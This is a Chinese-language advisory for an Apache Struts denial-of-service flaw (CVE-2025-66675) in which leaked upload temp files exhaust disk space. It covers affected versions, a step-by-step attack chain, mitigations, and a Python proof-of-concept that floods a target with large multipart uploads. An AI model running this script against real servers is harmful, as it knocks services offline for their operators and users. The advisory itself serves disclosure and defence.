CVE-2025-66675 Apache Struts拒绝服务漏洞（文件泄漏导致磁盘耗尽）

漏洞信息

漏洞编号

CVE-2025-66675

漏洞类型

拒绝服务/文件泄漏

CVSS评分

8.2 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Apache Struts

漏洞概述

CVE-2025-66675是Apache Struts框架中的一个高危拒绝服务漏洞。该漏洞源于Struts在处理multipart请求时的文件泄漏问题，攻击者可以通过发送特制的恶意multipart请求来触发此漏洞。当Apache Struts处理文件上传请求时，由于不正确的文件处理逻辑，系统会创建大量临时文件但未能及时清理，导致磁盘空间逐渐耗尽。CVSS评分8.2，属于高危漏洞，攻击复杂度低且无需认证即可远程利用。此漏洞影响了Apache Struts的多个版本，从2.0.0到6.7.4以及7.0.0到7.0.3版本均受影响。一旦攻击成功，服务器磁盘空间将被耗尽，导致服务中断、应用崩溃或系统无法响应正常用户请求。建议用户立即升级到Apache Struts 6.8.0或7.1.1版本以修复此漏洞。此漏洞与CVE-2025-64775相关，后者补充了受影响版本6.7.4的信息。

技术细节

Apache Struts在处理multipart/form-data请求时存在文件管理缺陷。当用户上传文件时，Struts框架会在服务器端创建临时文件来存储上传的数据。在正常流程中，这些临时文件应该在请求处理完成后被删除。然而，由于代码中存在资源泄漏问题，某些情况下这些临时文件不会被正确清理，导致文件持续累积。攻击者可以构造大量恶意文件上传请求，每个请求都创建新的临时文件但不释放，最终耗尽服务器的磁盘空间。这种攻击方式具有以下特点：1) 攻击者无需认证即可发起攻击；2) 通过网络即可远程利用；3) 攻击复杂度低，只需发送大量HTTP multipart请求；4) 影响范围广泛，覆盖Struts 2.x和7.x系列。攻击成功后，服务器将无法创建新文件，导致应用程序崩溃、服务中断，甚至可能影响同一服务器上的其他应用。

攻击链分析

STEP 1

步骤1

信息收集：攻击者识别目标网站使用的Apache Struts框架版本，确认其属于受影响版本范围（2.0.0-6.7.4或7.0.0-7.0.3）

STEP 2

步骤2

构造恶意请求：攻击者构造包含大文件的HTTP multipart/form-data请求，这些请求会触发Struts的文件上传处理逻辑

STEP 3

步骤3

发送大量请求：攻击者通过自动化工具向目标服务器发送大量恶意文件上传请求，每个请求都会在服务器磁盘上创建临时文件

STEP 4

步骤4

文件泄漏累积：由于Struts存在文件泄漏漏洞，这些临时文件不会被正确清理，导致磁盘空间持续消耗

STEP 5

步骤5

磁盘耗尽：随着请求数量增加，服务器磁盘空间逐渐耗尽，导致应用程序无法写入日志、创建会话文件或处理新的请求

STEP 6

步骤6

服务拒绝：最终服务器因磁盘空间不足而拒绝服务，所有依赖该服务器的应用和用户请求都将无法正常处理

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys

# CVE-2025-66675 PoC - Apache Struts File Leak DoS
# Description: Send multiple multipart requests to exhaust disk space
# Target: Apache Struts servers with vulnerable multipart processing

TARGET_URL = sys.argv[1] if len(sys.argv) > 1 else "http://target.com/upload.action"
NUM_REQUESTS = 1000  # Number of requests to send

def create_malicious_file(size_kb=1024):
    """Generate a file of specified size for upload"""
    return b'X' * (size_kb * 1024)

def exploit_file_leak():
    """Exploit the file leak vulnerability by sending multiple file uploads"""
    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)'
    }
    
    print(f"[*] Starting CVE-2025-66675 exploit against {TARGET_URL}")
    print(f"[*] Sending {NUM_REQUESTS} malicious multipart requests...")
    
    for i in range(NUM_REQUESTS):
        files = {
            'upload': (f'malicious_file_{i}.txt', create_malicious_file(1024), 'text/plain')
        }
        try:
            response = requests.post(TARGET_URL, files=files, headers=headers, timeout=10)
            if i % 100 == 0:
                print(f"[*] Progress: {i}/{NUM_REQUESTS} requests sent")
        except requests.exceptions.RequestException as e:
            print(f"[!] Request {i} failed: {e}")
    
    print("[*] Exploit completed. Check disk space on target server.")

if __name__ == "__main__":
    exploit_file_leak()

影响范围

Apache Struts 2.0.0 - 2.5.x

Apache Struts 2.6.0 - 6.7.4

Apache Struts 7.0.0 - 7.0.3

防御指南

临时缓解措施

如果无法立即升级，可采取以下临时缓解措施：1) 在Web应用防火墙(WAF)上配置规则，限制单个IP的multipart请求频率和文件大小；2) 设置服务器磁盘空间监控，当磁盘使用率超过80%时发出告警；3) 配置操作系统级别的临时文件清理任务，定期删除/tmp和/var/tmp目录下的旧文件；4) 限制文件上传接口的访问，仅允许经过认证的用户使用；5) 考虑暂时禁用非必要的文件上传功能，直到完成版本升级。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-66675
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-66675
3 Details https://www.cvedetails.com/cve/CVE-2025-66675/
4 VulDB https://vuldb.com/cve/CVE-2025-66675
5 Link https://cve.org/CVERecord?id=CVE-2025-64775
6 Link https://cwiki.apache.org/confluence/display/WW/S2-068